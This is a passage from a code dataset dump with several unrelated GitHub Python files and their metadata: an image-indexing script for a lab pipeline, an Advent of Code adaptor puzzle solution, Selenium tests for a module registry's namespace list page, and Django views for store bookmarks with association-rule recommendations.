lsm.items():\n LOGGER.info(\"Running indexing/discovery on data set \" + dataset\n + \" with \" + str(len(lsmlist)) + \" LSM(s)\")\n if sys.version_info[0] == 2:\n carr = xrange(0, len(lsmlist), 50)\n else:\n carr = range(0, len(lsmlist), 50)\n chunks = [lsmlist[i:i + 50] for i in carr]\n for sublist in chunks:\n post = {\"lsmNames\": sublist}\n LOGGER.debug(\" Posting \" + str(len(sublist)) + \" LSM(s)\")\n if ARG.TEST:\n COUNT['success'] += len(sublist)\n INDEXED[dataset] = INDEXED.setdefault(dataset, 0) + len(sublist)\n else:\n print(f\"process/owner/system/dataSet/{dataset}/lsmPipelines\")\n print(post)\n call_responder('jacs', 'process/owner/system/dataSet/'\n + dataset + '/lsmPipelines', post)\n COUNT['success'] += len(sublist)\n INDEXED[dataset] = INDEXED.setdefault(dataset, 0) + len(sublist)\n print('Unindexed images: %d' % COUNT['found'])\n if COUNT['skipped']:\n print('Skipped images: %d' % COUNT['skipped'])\n print('Images successfully %s: %d' % (operation, COUNT['success']))\n if INDEXED:\n for dset in sorted(INDEXED):\n print(' %s: %d' % (dset, INDEXED[dset]))\n if COUNT['failure']:\n print('Images failing indexing: %d' % COUNT['failure'])\n if slide_code and (ARG.INDEX or ARG.DISCOVER) and not ARG.TEST:\n discover_and_process(slide_code)\n\n\ndef index_image(config, grammar, name, data_set):\n command = ['perl', '/groups/scicompsoft/informatics/bin/sage_loader.pl', '-config',\n config, '-grammar', grammar, '-item', name, '-lab',\n 'flylight', '-verbose', '-description',\n '\"Image load from 
indexing_cleanup\"']\n LOGGER.info('Processing %s %s', data_set, name)\n LOGGER.debug(' ' + ' '.join(command))\n with open(\"sage_loader_commands.sh\", \"a\", encoding=\"ascii\") as OUTSTREAM:\n OUTSTREAM.write(' '.join(command) + \"\\n\")\n try:\n if ARG.TEST:\n tmp = 'OK'\n else:\n tmp = subprocess.check_output(command, stderr=subprocess.STDOUT)\n if (tmp.find('Cannot read file') != -1) or \\\n (tmp.find('Permission denied') != -1) or \\\n (tmp.find('Unable to uncompress the stack') != -1):\n LOGGER.error(' Could not read LSM file')\n COUNT['failure'] += 1\n elif tmp.find('Incomplete image processing') != -1:\n LOGGER.error(' Image processing failed')\n COUNT['failure'] += 1\n else:\n COUNT['success'] += 1\n INDEXED[data_set] = INDEXED.setdefault(data_set, 0) + 1\n except subprocess.CalledProcessError as err:\n print(err.output)\n COUNT['failure'] += 1\n except Exception as err:\n print(err)\n COUNT['failure'] += 1\n\n\n# -----------------------------------------------------------------------------\n\n\nif __name__ == '__main__':\n PARSER = argparse.ArgumentParser(description='Find and index/discover newly tmogged imagery')\n PARSER.add_argument('--ids', dest='IDS', action='store',\n help='File of image IDs (optional)')\n PARSER.add_argument('--data_set', dest='DATASET', action='store',\n help='Data set (optional)')\n PARSER.add_argument('--slide_code', dest='SLIDE', action='store',\n help='Slide code (optional)')\n PARSER.add_argument('--index', action='store_true', dest='INDEX',\n default=False, help='Run indexing')\n PARSER.add_argument('--discover', action='store_true', dest='DISCOVER',\n default=False, help='Run discovery and image processing')\n PARSER.add_argument('--verbose', action='store_true', dest='VERBOSE',\n default=False, help='Turn on verbose output')\n PARSER.add_argument('--debug', action='store_true', dest='DEBUG',\n default=False, help='Turn on debug output')\n PARSER.add_argument('--test', action='store_true', dest='TEST',\n default=False,\n help='Test mode - does not actually run the indexer or discovery')\n PARSER.add_argument('--all', action='store_true', dest='ALL',\n default=False,\n help='Selects all images, not just overdue ones')\n PARSER.add_argument('--override', action='store_true', dest='OVERRIDE',\n default=False,\n help='Selects all images regardless of prior load')\n ARG = PARSER.parse_args()\n LOGGER = colorlog.getLogger()\n ATTR = colorlog.colorlog.logging if \"colorlog\" in dir(colorlog) else colorlog\n if ARG.DEBUG:\n LOGGER.setLevel(ATTR.DEBUG)\n elif ARG.VERBOSE:\n LOGGER.setLevel(ATTR.INFO)\n else:\n LOGGER.setLevel(ATTR.WARNING)\n HANDLER = colorlog.StreamHandler()\n HANDLER.setFormatter(colorlog.ColoredFormatter())\n LOGGER.addHandler(HANDLER)\n initialize_program()\n process_images()\n", "repo_name": "JaneliaSciComp/ImagingEcosystem", "sub_path": "bin/indexing_cleanup.py", "file_name": "indexing_cleanup.py", "file_ext": "py", "file_size_in_byte": 14157, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.post", "line_number": 58, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 60, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 72, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 80, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 92, 
"usage_type": "call"}, {"api_name": "MySQLdb.Error", "line_number": 94, "usage_type": "attribute"}, {"api_name": "MySQLdb.cursors", "line_number": 97, "usage_type": "attribute"}, {"api_name": "MySQLdb.Error", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 106, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 115, "usage_type": "call"}, {"api_name": "os.system", "line_number": 146, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 147, "usage_type": "call"}, {"api_name": "os.system", "line_number": 153, "usage_type": "call"}, {"api_name": "MySQLdb.Error", "line_number": 194, "usage_type": "attribute"}, {"api_name": "MySQLdb.Error", "line_number": 202, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 209, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 238, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 282, "usage_type": "call"}, {"api_name": "subprocess.STDOUT", "line_number": 282, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 294, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 306, "usage_type": "call"}, {"api_name": "colorlog.getLogger", "line_number": 331, "usage_type": "call"}, {"api_name": "colorlog.colorlog", "line_number": 332, "usage_type": "attribute"}, {"api_name": "colorlog.StreamHandler", "line_number": 339, "usage_type": "call"}, {"api_name": "colorlog.ColoredFormatter", "line_number": 340, "usage_type": "call"}]} +{"seq_id": "27927497991", "text": "from typing import List\nfrom collections import Counter\nfrom copy import deepcopy\nfrom pathlib import Path\n\n\nAdaptor = int\n\n\ndef get_joltage_differences(adaptors: List[Adaptor]) -> List[int]:\n ordered_adaptors = deepcopy(adaptors)\n ordered_adaptors.extend([0, max(adaptors) + 3])\n ordered_adaptors.sort()\n differences = [this - previous for this, previous in zip(ordered_adaptors[1:], ordered_adaptors[:-1])]\n return differences\n\n\ndef get_joltage_difference_distribution(adaptors: List[Adaptor]) -> Counter:\n joltage_differences = get_joltage_differences(adaptors)\n return Counter(joltage_differences)\n\n\ndef get_valid_adaptor_combinations(joltage_differences: List[int]) -> int:\n\n if 3 in joltage_differences:\n first_3 = joltage_differences.index(3)\n subset_before = joltage_differences[:first_3]\n subset_after = joltage_differences[first_3+1:]\n return get_valid_adaptor_combinations(subset_before) * get_valid_adaptor_combinations(subset_after)\n\n if len(joltage_differences) == 0:\n return 1\n if joltage_differences[0] > 3:\n return 0\n if len(joltage_differences) == 1:\n return 1\n\n remaining_differences_if_included = joltage_differences[1:]\n combinations_including_this_adaptor = get_valid_adaptor_combinations(remaining_differences_if_included)\n\n remaining_differences_if_excluded = joltage_differences[1:]\n remaining_differences_if_excluded[0] += joltage_differences[0]\n combinations_excluding_this_adaptor = get_valid_adaptor_combinations(remaining_differences_if_excluded)\n\n return combinations_including_this_adaptor + combinations_excluding_this_adaptor\n\n\ndef main(file_path: Path = Path(__file__).parent / 'input_files' / 'day_10.txt'):\n with open(file_path) as f:\n adaptors = [int(line.strip()) for line in f.readlines()]\n joltage_distribution = get_joltage_difference_distribution(adaptors)\n print(f'1-jolt * 3-jolt is {joltage_distribution[1] * 
joltage_distribution[3]}')\n joltage_differences = get_joltage_differences(adaptors)\n adaptor_combinations = get_valid_adaptor_combinations(joltage_differences)\n print(f'there are {adaptor_combinations} combinations of adaptors that work')\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "mikealfare/advent-of-code-2020", "sub_path": "src/advent_of_code/day_10.py", "file_name": "day_10.py", "file_ext": "py", "file_size_in_byte": 2259, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 10, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 11, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 20, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "38232702199", "text": "\nfrom datetime import datetime\nfrom unittest import mock\n\nimport pytest\nfrom selenium.webdriver.common.by import By\nimport selenium\n\nfrom test.selenium import SeleniumTest\nfrom terrareg.models import ModuleVersion, Namespace, Module, ModuleProvider\nfrom .test_data import one_namespace_test_data\n\nclass TestNamespaceList(SeleniumTest):\n \"\"\"Test namespace list page.\"\"\"\n\n def test_namespace_list_page(self):\n \"\"\"Test namespace list page.\"\"\"\n self.selenium_instance.get(self.get_url('/modules'))\n\n assert self.selenium_instance.title == 'Namespaces - Terrareg'\n\n # Get content section\n content = self.wait_for_element(By.ID, 'namespace-list-content')\n\n # Check title\n assert content.find_element(By.TAG_NAME, 'h1').text == 'Namespaces'\n\n expected_namespaces = [\n ['emptynamespace', 'emptynamespace'],\n ['javascriptinjection', 'javascriptinjection'], ['moduledetails', 'moduledetails'],\n ['moduleextraction', 'moduleextraction'], ['modulesearch', 'modulesearch'],\n ['modulesearch-contributed', 'modulesearch-contributed'],\n ['modulesearch-trusted', 'modulesearch-trusted'], ['mostrecent', 'mostrecent'],\n ['mostrecentunpublished', 'mostrecentunpublished'], ['onlybeta', 'onlybeta'],\n ['onlyunpublished', 'onlyunpublished'], ['real_providers', 'real_providers'],\n ['relevancysearch', 'relevancysearch'], ['repo_url_tests', 'repo_url_tests'],\n ['searchbynamespace', 'searchbynamespace'], ['testmodulecreation', 'testmodulecreation'],\n ['testnamespace', 'testnamespace'], ['trustednamespace', 'trustednamespace'],\n ['unpublished-beta-version-module-providers', 'unpublished-beta-version-module-providers'],\n ['version-constraint-test', 'version-constraint-test'],\n # Namespace with a display name\n ['A Display Name', 'withdisplayname']\n ]\n\n # Check namespaces\n table_body = content.find_element(By.ID, 'namespaces-table-data')\n for namespace_tr in table_body.find_elements(By.TAG_NAME, 'tr'):\n expected_name, expected_id = expected_namespaces.pop(0)\n\n link = namespace_tr.find_element(By.TAG_NAME, 'a')\n assert link.text == expected_name\n assert link.get_attribute('href') == self.get_url(f'/modules/{expected_id}')\n\n\nclass TestNamespaceListSingleNamespace(SeleniumTest):\n \"\"\"Test namespace list page with single namespace\"\"\"\n\n _TEST_DATA = one_namespace_test_data\n _USER_GROUP_DATA = None\n\n def test_namespace_list_page_redirect(self):\n \"\"\"Test namespace list page 
with one namespace.\"\"\"\n self.selenium_instance.get(self.get_url('/modules'))\n\n # Ensure page is redirected to namespace page\n self.assert_equals(lambda: self.selenium_instance.current_url, self.get_url('/modules/testnamespace'))\n\n\nclass TestNamespaceListNoNamespaces(SeleniumTest):\n \"\"\"Test namespace list page with no namespaces\"\"\"\n\n _TEST_DATA = {}\n _USER_GROUP_DATA = None\n\n def test_namespace_list_page_warning(self):\n \"\"\"Test namespace list page with no namespaces.\"\"\"\n self.selenium_instance.get(self.get_url('/modules'))\n\n self.assert_equals(lambda: self.selenium_instance.current_url, self.get_url('/initial-setup'))\n", "repo_name": "MatthewJohn/terrareg", "sub_path": "test/selenium/test_namespace_list.py", "file_name": "test_namespace_list.py", "file_ext": "py", "file_size_in_byte": 3346, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 169, "dataset": "github-code", "pt": "52", "api": [{"api_name": "test.selenium.SeleniumTest", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 26, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 47, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 47, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, "usage_type": "name"}, {"api_name": "test.selenium.SeleniumTest", "line_number": 55, "usage_type": "name"}, {"api_name": "test_data.one_namespace_test_data", "line_number": 58, "usage_type": "name"}, {"api_name": "test.selenium.SeleniumTest", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "18469576254", "text": "from django.shortcuts import get_object_or_404, render\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom .serializers import BookmarkListSerializer, BookmarkSerializer\nfrom .models import Bookmark\nfrom stores.models import Store\nfrom reviews.models import Review\nfrom reviews.models import Hashtag\nfrom stores.serializers import StoreSerializer, StoreDetailSerializer\nfrom django.db.models import Count\n\n# Create your views here.\n\ndef custom_store_serializer(infos):\n storeList = []\n for info in infos:\n store = get_object_or_404(Store, pk=info[\"id\"])\n store_serializer = StoreDetailSerializer(store)\n imgs = []\n twitter_ids = []\n groups = set()\n for review in info[\"review_set\"]:\n if len(imgs) < 2:\n imgs.append(review[\"img_url\"])\n twitter_ids.append(review[\"twitter_id\"])\n for hashtag in review[\"hashtags\"]:\n for key, value in hashtag.items():\n if key == \"group\" and value == \"ETC\":\n groups.add(hashtag[\"singer\"])\n elif key == \"group\" and value != \"ETC\":\n groups.add(value)\n data = {\n \"store\": StoreDetailSerializer(store).data,\n \"imgs\": imgs,\n \"reviews\": twitter_ids,\n \"group\": groups,\n }\n 
storeList.append(data)\n return storeList\n\n\n\n@api_view(['GET','POST'])\ndef bookmark_list_create(request):\n if request.method == 'GET':\n bookmarks = request.user.bookmark_set.all()\n serializer = BookmarkListSerializer(bookmarks, many=True)\n return Response(serializer.data)\n else:\n serializer = BookmarkListSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save(user=request.user)\n\n bookmarks = request.user.bookmark_set.all()\n serializer = BookmarkListSerializer(bookmarks, many=True)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\n@api_view(['GET','PUT','DELETE'])\ndef bookmark_update_delete(request, bookmark_pk):\n bookmark = get_object_or_404(Bookmark, pk=bookmark_pk)\n if not request.user.bookmark_set.filter(pk=bookmark_pk).exists():\n return Response({'detail':'권한이 없습니다.'}, status=status.HTTP_403_FORBIDDEN)\n\n if request.method == 'GET':\n bookmark_store = bookmark.stores.all()\n serializer = StoreSerializer(bookmark_store,many=True)\n data = {\n \"title\" :bookmark.title,\n \"stores\" : custom_store_serializer(serializer.data)\n }\n return Response(data)\n\n if request.method == 'PUT':\n serializer = BookmarkListSerializer(bookmark, data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n else:\n bookmark.delete()\n \n bookmarks = request.user.bookmark_set.all()\n serializer = BookmarkListSerializer(bookmarks, many=True)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n\n@api_view([\"POST\"])\ndef bookmark_add(request, store_pk):\n if request.user.is_authenticated:\n store = get_object_or_404(Store, pk=store_pk)\n ids = request.data['id']\n for i in ids:\n bookmarks = request.user.bookmark_set.filter(stores=store_pk)\n if not request.user.bookmark_set.filter(pk=i).exists():\n return Response({'detail':'권한이 없습니다.'}, status=status.HTTP_403_FORBIDDEN)\n\n if not store.bookmarks.filter(pk=i).exists():\n if not bookmarks:\n store.store_cnt += 1\n store.save()\n store.bookmarks.add(i)\n\n return Response(status=status.HTTP_201_CREATED)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n\n@api_view([\"POST\"])\ndef bookmark_del(request, bookmark_pk):\n if request.user.is_authenticated:\n bookmark = get_object_or_404(Bookmark, pk=bookmark_pk)\n if not request.user.bookmark_set.filter(pk=bookmark_pk).exists():\n return Response({'detail':'권한이 없습니다.'}, status=status.HTTP_403_FORBIDDEN)\n\n ids = request.data['id']\n for i in ids:\n if bookmark.stores.filter(pk=i).exists():\n bookmark.stores.remove(i)\n bookmarks = request.user.bookmark_set.filter(stores=i)\n store = get_object_or_404(Store, pk=i)\n\n if not bookmarks:\n store.store_cnt -= 1\n store.save()\n serializer = BookmarkSerializer(bookmark)\n return Response(serializer.data)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n\n@api_view([\"GET\"])\ndef hashtag_similar(request):\n if request.user.is_authenticated:\n # 북마크가 있을 경우\n if request.user.bookmark_set.all():\n # 북마크에 있는 모든 스토어\n bookmarks = request.user.bookmark_set.values('stores')\n # 가장 해시태그\n topstores = Review.objects.filter(store_id__in=bookmarks).values('hashtags').annotate(Count('hashtags')).order_by('-hashtags__count')[0]\n # 가장 많은 해시태그의 그룹\n hashtag = Hashtag.objects.get(pk=topstores['hashtags']).group\n # 해당 그룹의 다른 멤버 해시태그\n tags = Hashtag.objects.filter(group=hashtag).values_list('id').order_by('?')[:4]\n\n similar_hashtag = []\n for tag in tags:\n similar_reviews = Review.objects.filter(hashtags__in=tag).order_by('?')[:8]\n 
similar_stores = Store.objects.filter(review__in=similar_reviews)\n serializer = StoreSerializer(similar_stores, many=True)\n tag = Hashtag.objects.get(id__in=tag).title\n data = {\n \"hashtag\" : tag,\n \"stores\":serializer.data\n }\n similar_hashtag.append(data)\n \n return Response(similar_hashtag)\n\n # 북마크가 없을 경우\n else:\n tags = Hashtag.objects.values_list('id').order_by('?')[:4]\n similar_hashtag = []\n for tag in tags:\n similar_reviews = Review.objects.filter(hashtags__in=tag).order_by('?')[:8]\n similar_stores = Store.objects.filter(review__in=similar_reviews)\n serializer = StoreSerializer(similar_stores, many=True)\n tag = Hashtag.objects.get(id__in=tag).title\n data = {\n \"hashtag\" : tag,\n \"stores\":serializer.data\n }\n similar_hashtag.append(data)\n return Response(similar_hashtag)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n\nfrom mlxtend.frequent_patterns import association_rules\nfrom mlxtend.preprocessing import TransactionEncoder\nfrom mlxtend.frequent_patterns import apriori\nimport pandas as pd\n\n@api_view([\"POST\"])\ndef create_recom_data(request): # DB에 생성된 모든 북마크 간 유사도 비교한 데이터 만들기(주기적으로 update해줘야함)\n bookmarks = Bookmark.objects.all()\n\n stores = []\n for bookmark in bookmarks:\n bm = []\n for store in bookmark.stores.all():\n bm.append(store.store_name)\n stores.append(bm)\n\n # 위 dataset을 True, False로 표시하고 dataframe으로 나타냄\n te = TransactionEncoder()\n te_result = te.fit(stores).transform(stores)\n df = pd.DataFrame(te_result, columns=te.columns_)\n # 데이터 프레임에서 각 itemset의 support를 구함\n # min_support이상의 support부터 나타남\n frequent = apriori(df, min_support=0.001, use_colnames=True)\n # 특정 개수 이상의 itemset만 추출\n frequent['length'] = frequent['itemsets'].apply(lambda x: len(x))\n freq1 = frequent[frequent['length'] <= 6]\n print(freq1)\n\n # 신뢰도 구하기\n # 최소 신뢰도가 0.8이상인 것만 추출\n rules = association_rules(freq1, metric='confidence', min_threshold=0.8)\n df = rules.sort_values(by=['lift'], ascending=False)\n df['antec_length'] = df['antecedents'].apply(lambda x: len(x))\n result = df.sort_values(by=['antec_length', 'lift'], ascending=False)\n\n def remove_set(string):\n new_string = \"\"\n for c in string:\n if c not in [\"frozenset\", '\"', \"(\", \")\", \"{\", \"}\", \"'\"]:\n new_string += c\n return new_string[9:]\n\n\n df.to_csv(\"recommendation.csv\", index=False, encoding='utf-8-sig')\n doc = pd.read_csv('recommendation.csv')\n doc['antecedents'] = doc['antecedents'].apply(remove_set)\n doc['consequents'] = doc['consequents'].apply(remove_set)\n print(doc)\n doc.to_csv(\"recommendation_final.csv\", index=False, encoding='utf-8-sig')\n return Response({'detail':'success'})\n\n# bookmarks = Bookmark.objects.all()\n# stores = []\n# for bookmark in bookmarks:\n# bm = []\n# for store in bookmark.stores.all():\n# bm.append(store.store_name)\n# stores.append(bm)\n\n# te = TransactionEncoder()\n# te_result = te.fit(stores).transform(stores)\n# df = pd.DataFrame(te_result, columns=te.columns_)\n# print(df)\n# # 데이터 프레임에서 각 itemset의 support를 구함\n# # min_support이상의 support부터 나타남\n# frequent = apriori(df, min_support=0.001, use_colnames=True)\n# print(frequent)\n# bookmark = get_object_or_404(Bookmark, pk=1)\n# print(bookmark.stores.all())\n# bookmark = get_object_or_404(Bookmark, pk=5)\n# print(bookmark.stores.all())\n# bookmark = get_object_or_404(Bookmark, pk=6)\n# print(bookmark.stores.all())\n# bookmark = get_object_or_404(Bookmark, pk=7)\n# print(bookmark.stores.all())\n\n\nfrom accounts.models import User\n@api_view([\"GET\"])\ndef 
recommendation_lst(request):\n # user = get_object_or_404(User, pk=2)\n user = request.user\n user_bookmarks = user.bookmark_set.all()\n\n # 로그인한 유저가 북마크한 식당들\n user_store_lst = set()\n for bookmark in user_bookmarks:\n for store in bookmark.stores.all():\n user_store_lst.add(store.store_name)\n\n try:\n # 이미 북마크 사이 유사도가 분석되어 있는 데이터 가져옴 \n df = pd.read_csv('recommendation_final.csv')\n\n def str_to_set(stores):\n store_lst = set([store.strip() for store in stores.split(',')])\n return store_lst\n\n df['antecedents'] = df['antecedents'].apply(str_to_set)\n df['consequents'] = df['consequents'].apply(str_to_set)\n \n result = df[df['antecedents'] >= user_store_lst].sort_values(by=['antec_length', 'lift'], ascending=[False, False])\n recommend_stores = result['consequents']\n except:\n recommend_stores = []\n \n # 추천된 식당 담을 set(str으로 담김)\n recommend_result = set()\n for lst in recommend_stores:\n for store in lst:\n if len(recommend_result) == 6: # 6개까지만 추천\n break\n if store not in user_store_lst:\n recommend_result.add(store)\n if recommend_result:\n # str으로 담긴 추천 식당을 queryset으로 담음\n store_detail = []\n for store in recommend_result:\n store_detail.append(get_object_or_404(Store, store_name=store))\n if len(recommend_result) == 10:\n # 추천 식당 serialize\n serializer = StoreSerializer(store_detail, many=True)\n storeList = custom_store_serializer(serializer.data)\n else: # 북마크 기반 추천을 6개 받지 못하면 나머지는 랜덤으로 받음\n recommend_stores = Store.objects.order_by('?')[:10-len(recommend_result)]\n store_detail += recommend_stores\n serializer = StoreSerializer(store_detail, many=True)\n storeList = custom_store_serializer(serializer.data)\n else: # 사용자의 북마크가 없을 때\n recommend_stores = Store.objects.order_by('?')[:10]\n # print(recommend_stores)\n serializer = StoreSerializer(recommend_stores, many=True)\n storeList = custom_store_serializer(serializer.data)\n \n return Response(storeList)\n", "repo_name": "hoya0415/K-Chelin", "sub_path": "backend/bookmarks/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 12292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.get_object_or_404", "line_number": 20, "usage_type": "call"}, {"api_name": "stores.models.Store", "line_number": 20, "usage_type": "argument"}, {"api_name": "stores.serializers.StoreDetailSerializer", "line_number": 21, "usage_type": "call"}, {"api_name": "stores.serializers.StoreDetailSerializer", "line_number": 36, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 51, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 53, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 58, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 59, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 59, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 59, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 46, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Bookmark", "line_number": 64, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 66, "usage_type": "call"}, {"api_name": 
"rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 66, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 66, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 70, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 75, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 78, "usage_type": "call"}, {"api_name": "serializers.BookmarkListSerializer", "line_number": 85, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 86, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 86, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 62, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 92, "usage_type": "call"}, {"api_name": "stores.models.Store", "line_number": 92, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 97, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 97, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 105, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 105, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 105, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 106, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 106, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 106, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 112, "usage_type": "call"}, {"api_name": "models.Bookmark", "line_number": 112, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 114, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 114, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 114, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 121, "usage_type": "call"}, {"api_name": "stores.models.Store", "line_number": 121, "usage_type": "argument"}, {"api_name": "serializers.BookmarkSerializer", "line_number": 126, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 127, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 128, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 128, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 128, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 109, "usage_type": "call"}, {"api_name": "reviews.models.Review.objects.filter", "line_number": 139, "usage_type": "call"}, {"api_name": "reviews.models.Review.objects", "line_number": 139, "usage_type": "attribute"}, {"api_name": "reviews.models.Review", "line_number": 139, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 139, "usage_type": "call"}, 
{"api_name": "reviews.models.Hashtag.objects.get", "line_number": 141, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 141, "usage_type": "name"}, {"api_name": "reviews.models.Hashtag.objects.filter", "line_number": 143, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 143, "usage_type": "name"}, {"api_name": "reviews.models.Review.objects.filter", "line_number": 147, "usage_type": "call"}, {"api_name": "reviews.models.Review.objects", "line_number": 147, "usage_type": "attribute"}, {"api_name": "reviews.models.Review", "line_number": 147, "usage_type": "name"}, {"api_name": "stores.models.Store.objects.filter", "line_number": 148, "usage_type": "call"}, {"api_name": "stores.models.Store.objects", "line_number": 148, "usage_type": "attribute"}, {"api_name": "stores.models.Store", "line_number": 148, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 149, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects.get", "line_number": 150, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 150, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 157, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects.values_list", "line_number": 161, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 161, "usage_type": "name"}, {"api_name": "reviews.models.Review.objects.filter", "line_number": 164, "usage_type": "call"}, {"api_name": "reviews.models.Review.objects", "line_number": 164, "usage_type": "attribute"}, {"api_name": "reviews.models.Review", "line_number": 164, "usage_type": "name"}, {"api_name": "stores.models.Store.objects.filter", "line_number": 165, "usage_type": "call"}, {"api_name": "stores.models.Store.objects", "line_number": 165, "usage_type": 